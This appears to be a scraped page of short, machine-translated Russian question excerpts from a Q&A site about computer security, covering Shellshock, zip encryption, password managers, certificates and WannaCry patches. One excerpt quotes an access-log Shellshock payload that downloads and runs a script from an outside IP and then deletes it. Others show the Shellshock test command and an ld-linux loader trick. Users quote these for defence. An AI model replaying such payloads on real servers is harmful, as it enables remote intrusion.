Этот вопрос был перенесен из-за сбоя сервера, поскольку на него могут ответить суперпользователи. Мигрировал 6 лет назад . Продолжение названия будет «при ограниченных знаниях безопасности в Интернете». Недавно я установил небольшой сервер с компьютером низкого уровня, на котором запущен Debian, с...
Тестовая команда x='() { :;}; echo vulnerable' bash показывает, что моя установка Debian 8 (Jessie) уязвима даже при последних обновлениях. Исследования показывают, что есть исправление для стабильного и нестабильного, но это тестирование не исправлено. Я полагаю, что патч пройдет тестирование...
В течение многих лет стандартным советом в отношении сжатия и шифрования было то, что сила шифрования zip плохая. Это действительно так в наши дни? Я читал эту статью о WinZip (у него такая же плохая репутация). Согласно этой статье, проблема устранена при условии соблюдения нескольких правил при...
Я бы не стал доверять Dropbox мои банковские реквизиты и тому подобное (потому что многие ищут такую информацию), но безопасно ли хранить вещи, которые могут быть полезны для небольшого числа людей? Например, коммерчески конфиденциальная информация, проекты научных работ, листы ответов для оценок...
Закрыто. Этот вопрос не по теме . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он соответствовал теме Супер пользователя. Закрыто 4 года назад . Есть ли менеджер паролей, который я могу использовать на нескольких компьютерах, чтобы запомнить все...
Учитывая недавние проблемы атак типа «человек посередине», я фактически обратил внимание на предупреждение, которое я получаю при подключении к серверу: Выбрав Просмотр сертификата , я собирался проверить SHA1 отпечаток : Кому выдано : корсар эмитированных : корсар Действительно с : 9/5/2013 до...
Я читаю, что отключение Java, а не JavaScript, сделает мой компьютер более безопасным от атак вредоносных программ. Все указывает на то, что это действительно сделает его более безопасным, но нет никаких реальных причин, как то, что я потеряю в процессе просмотра, во всяком случае. Может кто-нибудь...
Сохранены ли сохраненные учетные данные удаленного рабочего стола (условно говоря) на локальном компьютере? По крайней мере, они нигде не хранятся в виде открытого текста, не так ли? Изменить: я понимаю присущие риски сохранения паролей. Конечно, хотя и есть спектр эффективности, например,...
Читая это , я обнаружил следующий эксплойт: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Этот фрагмент...
Что эквивалентно ntrights.exeв Windows 7? Мне нужно, чтобы его можно было запустить из командной
Моя компания планирует купить несколько ноутбуков для демонстрационных целей на обычном стенде. Раньше мы всегда покупали ноутбуки с гнездами для кенсингтона для типичных кабельных замков. Теперь ноутбук, который нам больше всего нравится, это ультрабук без слота для кенсингтона, и мы ищем...
Увидел это в access.logна моем тестовом сервере: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf...
Мне действительно нравится это дополнение HTTPS Everywhere для Firefox. Но я склонен к браузерному переходу, поэтому были ли выпущены похожие HTTPS-предпочтительные дополнения для других основных...
Закрыто . Этот вопрос должен быть более сфокусированным . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он был сосредоточен только на одной проблеме, отредактировав этот пост . Закрыто 2 года назад . В последнее время, в последний год или около того, я...
Учитывая, что эксплойт WannaCry Ransomware работает, я хотел проверить, есть ли на моем компьютере специальное обновление для системы безопасности, которое должно устранить уязвимость - по-видимому, MS17-010, если я понимаю уязвимость, и это действительно правильный патч. Как можно проверить эту...
Существует несколько поставщиков услуг, которые позволяют пользователю обходить межсетевые экраны или анонимно использовать свой веб-доступ. Некоторые из них используют прокси, некоторые используют VPN. Большинство людей говорят, что VPN обычно работают лучше, чем прокси. Они также, как правило,...
Это то, что я задавался вопросом в течение длительного времени. Если, скажем, я использую Gmail через https, может ли кто-нибудь прочитать мои чаты и электронные письма, если я использую незащищенную беспроводную сеть? Я предполагаю, что данные будут в безопасности, поскольку они используют...
Помимо основного вопроса, совместимы ли две технологии? Если да, то при каких обстоятельствах? Каковы относительные преимущества двух
Какие доступны варианты защиты паролем папки? Я говорю о том, что для доступа к папке требуется пароль, а не только права доступа пользователя. Является ли стороннее программное обеспечение безопасным и стабильным? Какие...
Как можно предотвратить или запретить запись или чтение файлов на ПК под управлением Windows с символом Unicode RLO (переопределение справа налево) в их имени (вредоносный метод подделки имен файлов)? Больше информации о юникоде RLO здесь: Символ Юникода 'ПЕРЕКРЫТИЕ ПРАВА НА ЛЕВОЙ' (U + 202E)...